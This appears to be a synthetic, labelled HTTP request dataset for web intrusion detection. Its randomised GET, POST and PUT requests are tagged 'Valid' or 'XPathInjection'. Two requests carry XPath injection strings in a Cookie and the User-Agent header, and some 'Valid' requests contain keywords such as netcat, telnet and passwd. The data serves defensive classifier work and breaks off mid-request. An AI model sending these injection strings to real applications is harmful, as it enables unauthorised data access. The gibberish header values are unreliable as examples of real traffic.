Max-Forwards: 6
MIME-Version: 5.0
Pragma: no-cache
Proxy-Authorization: ae9de sesszy=lt9eEk7
Authorization: NTLM ZXV0d2NwYTNoVW50bWVhaGxlck5kbGVlYnRhYWV0ZXJOYzNyRHJlaHk=
Range: 8-,926359-26,1-
Referer: /elsiIr.jsp
TE: deflate,chunked,trailers
Trailer: TE
User-Agent: Mozilla/7.3 (Machintosh; U; Mac OS X 0.4; nl-9j; rv:4.9.9) Gecko/80344130
UA-CPU: MIPS
UA-Disp: 162,931,16
UA-OS: Windows NT
UA-Color: color32
UA-Pixels: 931x0551
Via: 7.1 21.164.169.122, p8fi/8.9 www.oexapc.png:0, HTTP/8.6 www.tRtRr.jpeg
Transfer-Encoding: gzip
Upgrade: etm/8.2
Warning: 325 www.lmdi.jpg "lP9i9" 
X-Forwarded-For: 240.35.1.196
X-Serial-Number: 155809
----: ----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~

null

End - Id: 47832
Start - Id: 27138
class: Valid
GET /ee.7CWrP.tbUJq/tlqIEUhz/mL4jgRE_iG-1/o41aoo/iM@dxtuP/tbpetioEl/v1n6ir9arz/tmaA2hreB/selitAamtDo/SDWgtelnetzY.html?nwsrssse=dchild%29vu HTTP/1.1
Host: 41.202.121.219:80
Connection: eai8i
Accept: text/*
Accept-Charset: *;q=0.3
Accept-Encoding: gzip, deflate
Accept-Language: *;q=0.4
Cache-Control: max-stale
Client-ip: 236.125.206.21
Cookie: Ztnbo0mh0ag=%tmp%tneoannkaSni4;fNyafdeujcil=uI583-7N_;he=bwwg;orrtdxl=htsHrR5iioTn;aiweTifdoapr6=2675930;Zosaou=nidropdaA
Cookie2: $Version="2"
Date: Thu, 28 Apr 05 02:10:33 UTC
ETag: W/"8fhDsdofaWjAX49Q"
Expect: 100-continue
From: oteeT@sNmtb.st
If-Modified-Since: Thu, 09 Dec 04 24:50:33 GMT
If-Unmodified-Since: Sat, 03 Jul 04 09:25:04 CET
If-Match: *
If-None-Match: *
If-Range: Sat, 28 Mar 09 23:10:36 GMT
Max-Forwards: 8480
MIME-Version: 4.2
Pragma: siaFuls='S'
Proxy-Authorization: Basic YW90Z3lsbzc6YWFhcm4=
Authorization: NTLM ZWVlM2VoM2llcmRib21JbnRnbnJMYXNzbm1yOHJ0dGZnYTNk
Range: 876-071,453044-67,-1
Referer: http://www.r8siLqoH.uk/cwtioLc.nsf
TE: deflate,deflate,trailers
Trailer: TE
User-Agent: Mozilla/8.9 (Windows; U; Win 9x 9.0; xn-nr; rv:4.6.8) Gecko/06852649
UA-CPU: x86
UA-Disp: 940,210,8
UA-OS: Win98
UA-Color: color16
UA-Pixels: 621x863
Via: mbr/0.3 www.msiecowa.tiff
Transfer-Encoding: identity
Upgrade: fntcu/3.4, wotta/7.7, aL8n/3.8
Warning: 306 201.137.88.255 "tntlel" 
X-Forwarded-For: 229.229.25.15
X-Serial-Number: 0352610
----: ----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 27138
Start - Id: 8122
class: Valid
GET /diT-sQz6IZ/Dvo/aWDVhcOlyfb/e7nsltmte7Hhi/tatStaG/eMDhY1/rShn/nlih-/3cece1hks/shutdownKlVBylxtXFH/eXrnar7ee/pie.css?m5ha0eduk=hsaotds HTTP/1.1
Host: 83.89.98.141
Connection: rLtEl4o
Accept: */*;q=0.4
Accept-Charset: utf-8;q=0.9
Accept-Encoding: 
Accept-Language: *
Cache-Control: min-fresh=4626
Client-ip: 143.75.57.209
Cookie: Lz@2tfKk=e;CE9services6ljV.B=87DryDrHoUgb;1qjAo=acETool
Cookie2: $Version="8"
Date: Tue, 05 May 09 06:29:47 CET
ETag: W/"JNO.G5qjFA0TM4_"
Expect: 100-continue
From: Dsersuin@iraarby6eg.be
If-Modified-Since: Wed, 15 Dec 04 24:28:50 UTC
If-Unmodified-Since: Thu, 12 Apr 07 19:57:55 GMT
If-Match: *
If-None-Match: "sCGBfQY@5nehndiJlX"
If-Range: Sun, 17 May 09 14:35:46 CET
Max-Forwards: 74
MIME-Version: 1.3
Pragma: no-cache
Proxy-Authorization: Digest response="2b79C4EDCA0d95fFbDfB52b2ADbdd7C0"
Authorization: Digest realm
Range: 96926-503180,-72
Referer: http://eNllrlo.com/bENnshh/oatHe/lp5o/0inaEo/oqnEhu.jpeg
TE: gzip;q=0.4
Trailer: User-Agent
User-Agent: Mozilla/8.6 (compatible; Konqueror/7.1; Unix; lterzp; eerCc; luen)
UA-CPU: 68000
UA-Disp: 4009,1990,32
UA-OS: Win9x
UA-Color: color8
UA-Pixels: 5707x274
Via: FTP/5.7 63.125.4.29, 1.6 179.184.27.229, 1.3 www.a9onq.png
Transfer-Encoding: deflate
Upgrade: hossa/8.6
Warning: 489 www.eptt.jpg "7ceEepaUoi6" "Mon, 12 Oct 09 20:07:00 CET"
X-Forwarded-For: 17.216.217.132
X-Serial-Number: 35345
----: -------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 8122
Start - Id: 48409
class: XPathInjection
GET /6LY/a@MSrFQy-BQYw-5UYd-Z/pltcl/otyqsjsdAoeecu8n/eg8murtNaa/MZC9tJNoicmd5/oRnesxbenor5qhHie/4QnxkV.3sPSvfbn/qthr3eneesq/dyR6h.vyVq/sIUUxU.kC9ZQ/pFMefTzS17JCX4.asmx?lT9a3E1Dn-=3t5Rn&w6iErCnilBmh=s%3Fbsithne9%3F%5Bfd&tptS2=e%40macam6Vu&.IacceptIx=Iwi&cneaS=mservices%7E9fww%5Cetnt3Srs%26ahx&5IkarY0hhiedem=uSh9orsuseri%7Ce&E5=lqY&jea=r%3An&2octrgfyet=39302&atN4vza=0e0uvt4etu68T&ndptr=rSnRA8Od_Yp HTTP/1.0
Host: 236.57.169.23
Connection: close
Accept: video/*;q=0.9, application/*, audio/*;q=0.8
Accept-Charset: euc-tw, ks_c_5601-1987, utf-8, windows-1254;q=0.9, x-mac-chinesetrad;q=0.3
Accept-Encoding: gzip, compress;q=0.3, identity;q=0.3, deflate, deflate
Accept-Language: Ihyuo-ineroy, atrd-sdeoTinc, o-rzXch, tshegdy-In
Cache-Control: only-if-cached
Client-ip: 20.80.25.89
Cookie: fi9N5nohio=gLtNVB4Xz_l;seh=(i  <     count(ada/child::text())  and j   < count(ltu/child::comment())     and   k  <  count(mati/child::*) );V1rcqJ6_gnq=positionnWmp
Cookie2: $Version="68"
Date: Mon, 30 Oct 06 09:59:18 UTC
ETag: ".Lj17Nox0S6eIS0"
Expect: 100-continue
From: sioidlu@ocltctchs.com
If-Modified-Since: Wed, 27 Oct 04 09:28:41 UTC
If-Unmodified-Since: Thu, 09 Feb 06 02:23:43 CET
If-Match: "7nNtUheU6QkgWmrFRY0"
If-None-Match: *
If-Range: Wed, 19 Nov 08 11:32:52 GMT
Max-Forwards: 3335
MIME-Version: 6.4
Pragma: aeeneeh='m2ne4dd'
Proxy-Authorization: Digest response="CdEdc9ADFAE4eb4Adb9195AfC0DfF9e6"
Authorization: NTLM OGNvcnZydHNkdVV0cHJpZjZweXQxdGJubjV3bGFydGVieGllZXhhanNlbHQ=
Range: 10-,-037175,0931-3
Referer: /afe5/aalAieir.swf
TE: chunked;q=0.7,trailers,trailers
Trailer: If-Range
User-Agent: stte2OdI (wVzkvkXp5i; eaUs0bgUi; hWnZ0GOIr; 8U_@MlUTR@; hpv@_Ge)
UA-CPU: 68000
UA-Disp: 213,9851,16
UA-OS: Windows 98
UA-Color: color8
UA-Pixels: 0994x095
Via: FTP/8.5 1.91.205.253
Transfer-Encoding: qsuph; iitu=ldsti8Es
Upgrade: 7fwget/5.3
Warning: 153 www.9onRrt.tiff "afanoeRe7nhdoll" 
X-Forwarded-For: 83.226.88.8
X-Serial-Number: 7032962389
----: ----------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 48409
Start - Id: 17706
class: Valid
GET /uKUJB/qtlHgpiOit/imgNeaF7k./ndaid6nneHwhtel/cheejcih9e8ean1/uZi5a_engmFyCFeeNA.php?leesdzlsauhaiqs=zTHLFn15&aotenr0Demena=5633806485&pshttpsVp@ZBvar=78815238&2o5lenaapoeEep=nl%40eo&RabnetcatBi=b&P9scriptzQnHzD.AF=14884&tfai=3897&dnonav2=cBDyAYtk1g&n0o5jotx9stspe=hxtermjn&dI=0qpn+%26%3Bt&roUZkQQ=s.Tag&tnhtipt=62846260&.9evalMwX31=sM__4.%40k5gN&access_log6group byYKkconnect3b=iinsertyhttpiedg%25netcat1%28iaoCs HTTP/1.1
Host: 81.58.215.1
Connection: ftatboa
Accept: audio/x-wav
Accept-Charset: x-mac-icelandic, iso-10646-ucs-2, gb2312, x-mac-roman;q=0.7, iso-8859-8
Accept-Encoding: 
Accept-Language: iv-otpaa;q=0.4, Kdi0-c;q=0.2, i0itGmw-4nth
Cache-Control: no-cache
Client-ip: 142.96.191.196
Cookie: sItowe= fatdst;sehOi=risnetrl3;O2ahu=dwmm;rw6ou=99302;rj=HEhustae
Cookie2: $Version="9"
Date: Sun, 03 Jun 07 10:01:26 UTC
ETag: "DWYPHRUU5ciuYwz."
Expect: nsea=3aSeeh;7utdaTs
From: ham2@rhhtcs.de
If-Modified-Since: Tue, 29 Jan 08 08:19:08 UTC
If-Unmodified-Since: Sat, 16 Jun 07 06:29:25 UTC
If-Match: *
If-None-Match: "dBz_FfbAVTRxusjboD"
If-Range: *
Max-Forwards: 5
MIME-Version: 4.2
Pragma: oo9S2gsd='dm6o'
Proxy-Authorization: Basic bmdvY2g6bWNpdTlp
Authorization: AMsas teetvwf=eidyws
Range: -579,-690
Referer: /daOreo/Pbs1sPii/anah/uhvhtG7.pdf
TE: deflate;q=0.7,gzip;q=0.8
Trailer: Upgrade
User-Agent: taInws9d/8.1.2.6.1
UA-CPU: PowerPC
UA-Disp: 5186,988,32
UA-OS: Windows 95
UA-Color: color32
UA-Pixels: 7830x724
Via: 0.1 119.225.227.47:67180
Transfer-Encoding: gzip
Upgrade: 4rd/7.7, enhn/4.6, cfe/5.9
Warning: 693 205.206.134.117 "rkctrioeeS1hAa" "Mon, 18 Dec 06 11:42:54 CET"
X-Forwarded-For: 167.172.138.87
X-Serial-Number: 197606037
----: -----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 17706
Start - Id: 10407
class: Valid
GET /sEijienecoKiub9oy/sjRO.htm?rrai8eioi=63617&qoSdedianm2uagp=btpDtoealpsihnnen&5bbtturh=n HTTP/1.1
Host: 132.173.138.103
Connection: keep-alive
Accept: */*;q=0.9
Accept-Charset: iso-10646-ucs-2, big5
Accept-Encoding: *;q=0.2
Accept-Language: sE5tiis-tyhlds;q=0.4
Cache-Control: max-stale
Client-ip: 125.236.129.149
Cookie: styleAbids7C=5472;nmsrEsedntu=passwdeg Ai ;brl0meeyte6=oh4kbyo;SIlezcnraeai=1453066444;dq=01719
Cookie2: $Version="0"
Date: Tue, 16 Dec 08 22:27:27 GMT
ETag: "GfcGhNtO9Dp@cKZXz@J"
Expect: 100-continue
From: nyat1i@2oierendva.de
If-Modified-Since: Wed, 07 Nov 07 13:07:19 GMT
If-Unmodified-Since: Sat, 21 Apr 07 24:48:33 GMT
If-Match: "oajp5xVEz.jQC7V"
If-None-Match: "0HepOUWPjtanV2Rz"
If-Range: Sat, 05 Jul 08 12:47:50 CET
Max-Forwards: 3
MIME-Version: 2.8
Pragma: no-cache
Proxy-Authorization: 2tht ejer=oT7xhiau
Authorization: NTLM ZXRvZXdzc2VtYTdlbWY4dHBtcnZlT2M1bGZyT2l1dG5yaFNuYXJuZWFBaQ==
Range: 5-355295,61313-1,05930-37268
Referer: http://www.nerea.com/wr4t/gUsi/ndnlMd.shtml
TE: chunked,trailers,trailers
Trailer: From
User-Agent: 6f0sN/4.4.1.5
UA-CPU: StrongARM
UA-Disp: 1729,6694,8
UA-OS: Windows 95
UA-Color: color16
UA-Pixels: 552x911
Via: 3.2 119.115.143.19
Transfer-Encoding: identity
Upgrade: eso/3.5, ddji/0.2, bfcnj/3.8, ofsuw6/8.7
Warning: 317 www.nwo2aaL.html "hrhexamatrte3elRbtn" 
X-Forwarded-For: 248.234.188.76
X-Serial-Number: 664473
----: --------------------------------------
~~~~~: ~~~~~~~~~~~~~~

null

End - Id: 10407
Start - Id: 33536
class: Valid
POST /c4zrsEei3/aaoDIsct/KSW3/ol9cPQGCxb3O/Eo-7/BirrmBLJ@rqLdocument/oaHjF3H/eIL7eJqNc/sd1lhWbZ1Ej0KqU5F/abss8ptr.css? HTTP/1.0
Content-Length: 24
Content-Language: 6o9pe,diss8E,yitgh
Content-Encoding: gzip
Content-Location: http://6uaojeOq.uk/eeHslrio.jpg
Content-MD5: dGRzcHNlM2d3dXNhYW5nQQ==
Content-Type: application/x-www-form-urlencoded
Expires: Fri, 25 Sep 09 18:48:26 UTC
Last-Modified: Mon, 06 Apr 09 10:27:34 UTC
Host: www.dhutmyss.de:9159
Connection: keep-alive
Accept: application/*, video/*, image/*
Accept-Charset: *
Accept-Encoding: *;q=0.6
Accept-Language: isWke-sys35, fee-9Cex;q=0.1, ikirs-fd8ao;q=0.7
Cache-Control: 5okoau2='cghsle'
Client-ip: 159.128.250.243
Cookie: rese=9177;rT=I72nsxtm a;Ayeec=23560353
Cookie2: $Version="7"
Date: Fri, 02 Feb 07 04:27:08 GMT
ETag: "8d7tx@AdbGPU4WFyh"
Expect: 100-continue
From: Towr@gduxvle.gov
If-Modified-Since: Fri, 26 Aug 05 13:52:52 CET
If-Unmodified-Since: Fri, 13 Oct 06 07:27:44 CET
If-Match: *
If-None-Match: *
If-Range: Wed, 14 Mar 07 22:31:53 UTC
Max-Forwards: 008
MIME-Version: 2.1
Pragma: no-cache
Proxy-Authorization: n713 nu0mgu=rnh76te9
Authorization: NTLM c2JlcmV1bHNub2F0aW9ubGRTZHRiM3dBZmU0ZXNzYXludHNva2s=
Range: 495547-54
Referer: http://tec7.net/osieedl/ddhn/ccazU0lt/teeoe.txt
TE: trailers,gzip;q=0.7,deflate
Trailer: Pragma
User-Agent: Mozilla/1.6 (Windows; U; Win98 1.7; Ry-5u; rv:2.4.2) Gecko/31786421
UA-CPU: PowerPC
UA-Disp: 3608,908,32
UA-OS: WinNT
UA-Color: color16
UA-Pixels: 417x756
Via: HTTP/6.4 www.gnssiee.css, HTTP/1.2 www.reabrt2.jpg, tenl/4.3 78.117.207.240
Transfer-Encoding: ise9g
Upgrade: reroen/6.7
Warning: 727 27.123.139.72 "tsolhaaq6r" "Fri, 21 Jan 05 02:18:02 UTC"
X-Forwarded-For: 188.249.94.253
X-Serial-Number: 40780831538303970889
----: -----------
~~~~~: ~~~~~~~~~~

fm=761284604&saLthh3r=ly

End - Id: 33536
Start - Id: 9126
class: Valid
GET /alJc1fet8AGAix@2/aH9yr/p5HJLZzR/q@zfq6YBvUITrso49/Vzm@UiDoXsam.js?D8oSXbJgqT4=o2mbUc86eofrmeconnecti+l&aao3abdIr=65183&1GyED1BAXj1=nn&rdteft6sd91=016305&oqLbodyGawE=obe+cxboot.inihconnect%5C6ssIi&cjid=eEd&3yivuVsyC=5591&i4at6osId4b=%25uRFxp_bgsounddiv%26&nddc3=onfaoeri HTTP/1.0
Host: 53.105.215.179:0
Connection: close
Accept: audio/*;q=0.3, application/zip;q=0.6
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *;q=0.0
Cache-Control: ltdWl3t=8scz
Client-ip: 222.74.157.249
Cookie: 3UedwEecjrIR=Nd6upagbdes;tmooehe=Dosnmhveoa9o;enf9msonoehtlnl=0486933713
Cookie2: $Version="69"
Date: Thu, 28 Feb 08 02:40:54 CET
ETag: W/"by@6e2PNmLd5VzPy4"
Expect: eesmtek
From: eeesiPx@ic0asi3rFo.gov
If-Modified-Since: Sat, 12 Sep 09 18:35:34 UTC
If-Unmodified-Since: Thu, 19 Oct 06 09:19:59 GMT
If-Match: "dSSnYwjsC5jEefA9"
If-None-Match: *
If-Range: Tue, 20 Jan 04 20:53:00 CET
Max-Forwards: 1
MIME-Version: 9.1
Pragma: eoO4wale='nhoa'
Proxy-Authorization: PMhc eie4rqi=aerRel
Authorization: Digest opaque="toakls8w"
Range: 5-5905,-91,-3
Referer: /Rsstena/inahR1/hxeonomi.js
TE: trailers,trailers
Trailer: Accept-Charset
User-Agent: ceeeioNc5t/6.2.5
UA-CPU: x86
UA-Disp: 076,2269,16
UA-OS: Win9x
UA-Color: color32
UA-Pixels: 5631x6123
Via: 9.5 174.89.84.145, HTTP/1.5 www.cLetAomn.gif, FTP/0.8 www.o1khkre.jpeg:4
Transfer-Encoding: identity
Upgrade: Ccjte/2.9, 5asi/4.6, fxs/9.8, earNo/3.3
Warning: 685 144.205.150.196 "yel0eefhm0pmd" 
X-Forwarded-For: 133.164.153.69
X-Serial-Number: 688483710117371
----: ----------------------------------
~~~~~: ~~~~~~~~~~~~~~

null

End - Id: 9126
Start - Id: 30347
class: Valid
GET /atattadltehs6h/c3icnh1dn/hYemaslereszEdbe/ts/kuUlX@MVZxfVkA96Wyz/eJgspeSB/b0Pneyh5H-/AbsYd6@XqPfp8Hprocessing-instruction/mhd6.css? HTTP/1.1
Host: www.tvcnrt.com
Connection: r0skmzo
Accept: */*
Accept-Charset: x-mac-hebrew, x-mac-hebrew;q=0.9, iso-10646-ucs-2, iso-8859-8-i, iso-8859-8
Accept-Encoding: gzip
Accept-Language: 5-Ct;q=0.4, erais05-tptio
Cache-Control: min-fresh=96394
Client-ip: 31.249.228.172
Cookie: rhue6ehh9dhwtoa=1?mail;iteamqcume= p;lI1PZAm0NDS=aenphpi
Cookie2: $Version="768"
Date: Mon, 14 May 07 20:17:11 CET
ETag: W/"sSeJGMsGdG-8O4G"
Expect: 100-continue
From: aaS7di@esk6nosXr.cz
If-Modified-Since: Fri, 20 Feb 04 04:53:31 CET
If-Unmodified-Since: Mon, 28 Dec 09 12:55:12 UTC
If-Match: "9zyKOoQi16o6G@XSZ_Gr"
If-None-Match: "ROtvZ66vgdU2ykz"
If-Range: Thu, 20 Oct 05 13:01:19 CET
Max-Forwards: 62
MIME-Version: 0.4
Pragma: rhw8ud='U'
Proxy-Authorization: Basic MmZ0bGxjOnBpaXNv
Authorization: NTLM ZW95ZERmbWh1Y01wZnI2YXVucjdubmFFeW9lZGYxb2Nhc255U25qc2t5c21s
Range: 05745-,56-61
Referer: http://nLdn0d.net/snor/5smeIpi/rethe/esulgtu.msf
TE: trailers,gzip;q=0.0,gzip;q=0.0
Trailer: Host
User-Agent: AdAbo/4.4.2.4
UA-CPU: PowerPC
UA-Disp: 011,976,16
UA-OS: Mac OS X
UA-Color: color32
UA-Pixels: 033x3612
Via: 0.1 13.100.108.77, 5.9 www.airan.gif, FTP/1.1 151.96.205.88
Transfer-Encoding: identity
Upgrade: anxrdn/9.4, nRovoy/2.5, p6aym/9.5, 6rc/8.0, nAhe/8.8
Warning: 632 www.rTe2l.html "hcd9dnnAbmuvu5it" "Sun, 10 Sep 06 21:36:43 GMT"
X-Forwarded-For: 152.171.77.200
X-Serial-Number: 969767
----: -----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 30347
Start - Id: 20724
class: Valid
GET /oospwemb7a2/7clT@scriptONyg/zXeO.jpg?eeWnhCdtrh=6160588&y7tesi=rmtbap7jt&alb0pnddos3idi=9088&SilaaXae=672&ngda2nMiUl=a1telnet+&iarxnqaeBble=tks.HckA&tidhc=nullydsp+ehttpyno&dhvasmyreafdf31=Vae&8eaeiacSm8rpoy=mR&tseennlowr=orcp4ltskAm%29 HTTP/1.1
Host: www.romIuEbtnr.com
Connection: 6dCr
Accept: */*;q=0.0
Accept-Charset: *
Accept-Encoding: *;q=0.7
Accept-Language: *;q=0.7
Cache-Control: no-transform
Client-ip: 173.194.244.159
Cookie: ukzrliar4n=eht;Seadh=e5jrz;e2t13ewrhehf=llsrUT;cztRcpsiMqqsv=aSTrmTypue;qnhqOit=brietn
Cookie2: $Version="0"
Date: Wed, 04 Aug 04 02:40:18 UTC
ETag: W/"w6ax5AP9iiUNMxNU5"
Expect: 100-continue
From: mupderg@gn978yed5.fr
If-Modified-Since: Sun, 11 Nov 07 13:54:00 GMT
If-Unmodified-Since: Tue, 23 Feb 10 20:45:32 CET
If-Match: *
If-None-Match: "2hD2EXiyeHjlzUWF."
If-Range: *
Max-Forwards: 241
MIME-Version: 4.4
Pragma: soads=dhSfn
Proxy-Authorization: Digest nc=ce10aCbC
Authorization: NTLM dUVuQ3dlb3BhaWJMdGd0dG80TGdvYWxwamltYXN3bHNtbm91bmVhdQ==
Range: 161725-433276,-8,-97
Referer: http://www.goeyPd.de/ltxdoto/48Aefrn/uaaiorsl.pl
TE: chunked;q=0.5,chunked,trailers
Trailer: If-None-Match
User-Agent: Mozilla/5.2 (Windows; U; Win98 5.7; te-nt; rv:5.1.9) Gecko/22559337
UA-CPU: MIPS
UA-Disp: 8501,806,8
UA-OS: Solaris
UA-Color: color8
UA-Pixels: 413x553
Via: FTP/1.4 www.fcAeb.css, tgh3ro/8.3 www.0Cop.tiff, 2.0 187.249.51.181
Transfer-Encoding: compress
Upgrade: 3tlgha/2.3
Warning: 447 156.37.10.161 "oa0itiorbaoej2" 
X-Forwarded-For: 255.159.77.194
X-Serial-Number: 43053635016402500046
----: ------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~

null

End - Id: 20724
Start - Id: 35895
class: XPathInjection
PUT /Q4ibWQbzQntwphp/nknPsqo/nQHbPS-8pAzUUNZZMZ/r5ZBlb4WWOxgci/xc/tewld0Cti/i0/gQfe/teIys.shtml? HTTP/1.0
Content-Length: 206
Content-Language: iaaFtgt,oriistcn,yn
Content-Encoding: identity
Content-Location: /rlCynh/gtjmes0o/un3EvEi/0msaIEjn/3uAneh.php4
Content-MD5: c25UUHNsOGkzVG5zaG5uZQ==
Content-Type: application/x-www-form-urlencoded
Expires: Sun, 17 Aug 08 15:33:10 CET
Last-Modified: Thu, 23 Sep 04 17:10:58 GMT
Host: 197.81.161.9:14
Connection: keep-alive
Accept: audio/basic;q=0.5, application/*, text/*
Accept-Charset: iso-10646-ucs-2, windows-1250;q=0.3, windows-1250
Accept-Encoding: gzip
Accept-Language: ooeeo-e, e7n-g7po;q=0.5, tojsS-bojaiz;q=0.4, jaenm-xiwttowl;q=0.2, tetem-mi
Cache-Control: no-transform
Client-ip: 81.81.211.202
Cookie: oatisnyacn4=tDaz
Cookie2: $Version="92"
Date: Thu, 05 Jun 08 16:55:53 UTC
ETag: W/"5qAITUoanYbWZqC"
Expect: 100-continue
From: sloeldwe@xNeaihyz.uk
If-Modified-Since: Tue, 20 Oct 09 02:49:53 UTC
If-Unmodified-Since: Wed, 25 Oct 06 12:35:41 UTC
If-Match: *
If-None-Match: *
If-Range: "fGOMX4XUjbA4N2X"
Max-Forwards: 0
Pragma: no-cache
Proxy-Authorization: NTLM aXN0aWVyZW9nYWFwMnRhZXFheXRlOXB0czdiaGFhczVEZWFtb2xWaWxvYXJpbWNz
Authorization: Basic dWUwN2U6ZTJ0YjVzcg==
Range: -23690,93-568748,-273092
Referer: /rei5.avi
TE: gzip;q=0.4,deflate;q=0.2,gzip
Trailer: If-Modified-Since
User-Agent: hcca' or  path/child::node()[position()=N] or   'ueni' =   '
UA-CPU: PowerPC
Via: 5.9 www.oiEfs.htm, HTTP/4.6 www.powntun.js
Transfer-Encoding: compress
Upgrade: eriHhs/7.6, efsot/0.3, oHnr/4.8, d3rh/5.5, enaeO/2.1
Warning: 424 www.xto8ris.gif "1ioilnehhryaDn5sGe" "Sat, 21 Feb 04 10:37:48 GMT"
X-Forwarded-For: 174.27.30.162
X-Serial-Number: 503350081562336
----: -----------------------------------

aEnttwvitjoi=\pstt&heyxzcSo=eYZ7TDV&echa1Pon3n=uqXPLMVI&zS7P@W6=aelmt66sge5sioiq2&nzu5HZtAkP=sLTfW&ieib=3ais>0=wp-sjailoe3tta&9aoUIantc0i=ntooelerspteie&-VJB.='w8&shi2hnts5sTe6t=wX0&2t6aHco=cnoT1-P0

End - Id: 35895
Start - Id: 16110
class: Valid
GET /gdwx1q/sYYlE-pJK5hVDkyH51/lqq.1MnhZn88-gZ84/ondneWiclerjiq/msstreeahbabch/eml9Tve98TGkPDj/66busrE.dll?9xseskhesqm=yh9aherrto&q9VHUtet=4&atetisellp38=R&1ngauoreorj=s1elsdxao&Xz7eeiwYal0=6712&ezmb=Mf%25uiryse%5Bee+r&reazyefo=92606050&rmi=065334&uur8i8oeoldos=tgpMu&sxlf3e3nO3ep=9490&25R4cPJeYq=hUl9gY&ef=yejnhpnol&leq6El5mn=726 HTTP/1.1
Host: www.iNhuaWm.cz:80
Connection: Frdcq
Accept: */*;q=0.6
Accept-Charset: euc-jp;q=0.9, iso-8859-8;q=0.7
Accept-Encoding: gzip;q=0.4, gzip, compress;q=0.1, gzip
Accept-Language: n-el2tea1R;q=0.9, anhnh-rc4o;q=0.8
Cache-Control: only-if-cached
Client-ip: 183.144.222.112
Cookie: JCq8_jrZAbK=2;ictetydc=mj>o
Cookie2: $Version="41"
Date: Thu, 10 Aug 06 06:02:30 UTC
ETag: "tkwQroXJS.g2qTb"
Expect: 100-continue
From: c2a1pa@8itiJl.de
If-Modified-Since: Thu, 15 Feb 07 11:23:38 GMT
If-Unmodified-Since: Mon, 03 Nov 08 05:49:04 CET
If-Match: "sjfI0Podqvx2b8Ft"
If-None-Match: "SciYIA-iZzgCW_03"
If-Range: *
Max-Forwards: 52
MIME-Version: 3.0
Pragma: oemf='wleinrNb'
Proxy-Authorization: Digest uri=/ttihrsz/Tptn/rLV8/veluwm.js
Authorization: unht al2N8a=tns7mBet
Range: 303812-992,8-0,-1
Referer: /js8rw/Ayrhn.asmx
TE: gzip;q=0.4,trailers,chunked;q=0.4
Trailer: Trailer
User-Agent: Mozilla/5.9 (X11; U; SunOS sun4u 8.5; da-tr; rv:6.9.8) Gecko/30196756
UA-CPU: StrongARM
UA-Disp: 235,1889,16
UA-OS: FreeBSD
UA-Color: color32
UA-Pixels: 4520x648
Via: FTP/0.9 www.deir.shtml, eOt/7.1 www.I9ma.jpeg:3353
Transfer-Encoding: identity
Upgrade: ro1tlo/3.6, tuh/6.6
Warning: 964 221.114.71.110:2492 "9tmf4asphah" 
X-Forwarded-For: 44.155.173.100
X-Serial-Number: 6495346475
----: ---------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 16110
Start - Id: 19815
class: Valid
GET /hianeaett2/5R3tw/v33BqGOyUKW.EQyfq.bin?RinemreoEicqe=sam%27%5Dn+&ecr=tmp%5Dili&o8rotwz=682436445&zuilultuhN51=lidieh5kizYdrRdB&uh=%25eval7o5eNc&HGFIARg=u5zs8Kv&cp32j7allXXfH=hNladmin9&inre=r%26perl+&rszsr=wgto HTTP/1.1
Host: 100.180.89.59:34
Connection: close
Accept: text/xml;q=0.2, image/*;q=0.6, image/*
Accept-Charset: iso-8859-15, iso-8859-1, euc-kr;q=0.5, macintosh;q=0.1
Accept-Encoding: *
Accept-Language: *;q=0.7
Cache-Control: no-cache
Client-ip: 97.205.180.106
Cookie: UIdivpI6netcatT4D=i4duyWerPubf
Cookie2: $Version="774"
Date: Fri, 06 Jul 07 10:20:26 UTC
ETag: "TS2JMorKZGafPwYxG4ru"
Expect: 100-continue
From: ilotit@a0vnis.fr
If-Modified-Since: Wed, 06 Sep 06 14:17:25 GMT
If-Unmodified-Since: Sun, 22 Mar 09 01:59:25 UTC
If-Match: *
If-None-Match: "MGOE2b8LvGWYR7Xffzj"
If-Range: *
Max-Forwards: 0
MIME-Version: 6.4
Pragma: gf8nt=sarlor
Proxy-Authorization: Basic c3Q3dGx0OmFpaHBzc3k=
Authorization: OneaT Rerbi=a0ettAys
Range: -2442
Referer: http://www.ivcge8.net/reoc/nghaaol/paflTp.fgf
TE: trailers
Trailer: Cache-Control
User-Agent: Mozilla/0.3 (Machintosh; U; PPC Mac OS X 7.6; ld-jt; rv:5.8.6) Gecko/43280173
UA-CPU: PowerPC
UA-Disp: 0003,957,16
UA-OS: Windows 95
UA-Color: color16
UA-Pixels: 6942x692
Via: 7.6 www.eebafte.gif, 9.7 www.7bt8auUi.jpeg:8, 0.5 www.nreG0D.jpeg
Transfer-Encoding: gzip
Upgrade: urt/1.5, duy66/3.8, 6ru/6.9, sii/9.2
Warning: 943 237.25.13.45 "Lnhareesflia5" 
X-Forwarded-For: 176.249.106.242
X-Serial-Number: 09282554265324
----: --------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~

null

End - Id: 19815
Start - Id: 33981
class: Valid
POST /hFO/tuh0YBh/wqZA/hreymif2rRpI3et/oh5iwe3/hEMhelt7/cj.jpeg? HTTP/1.1
Content-Length: 62
Content-Language: rti
Content-Encoding: compress
Content-Location: /egivuaj/ano0e1c/ahun.dll
Content-MD5: dW50dG5pZW10aWM0Y2kwbA==
Content-Type: application/x-www-form-urlencoded
Expires: Mon, 10 Jan 05 15:20:12 GMT
Last-Modified: Fri, 27 Jan 06 16:05:42 UTC
Host: www.ggtsTnagtl.uk:34
Connection: close
Accept: audio/x-wav;q=0.7
Accept-Charset: cp-936, utf-7;q=0.2, windows-1257;q=0.2, iso-8859-6
Accept-Encoding: 
Accept-Language: *;q=0.6
Cache-Control: only-if-cached
Client-ip: 68.254.57.254
Cookie: khoLhryeeraE=nosI4N;ri1DfH8m=ocebe2sotci1coW;imitncshai=35;Twk166ahst=shTOl;yosEantLY=tlodb27io
Cookie2: $Version="3"
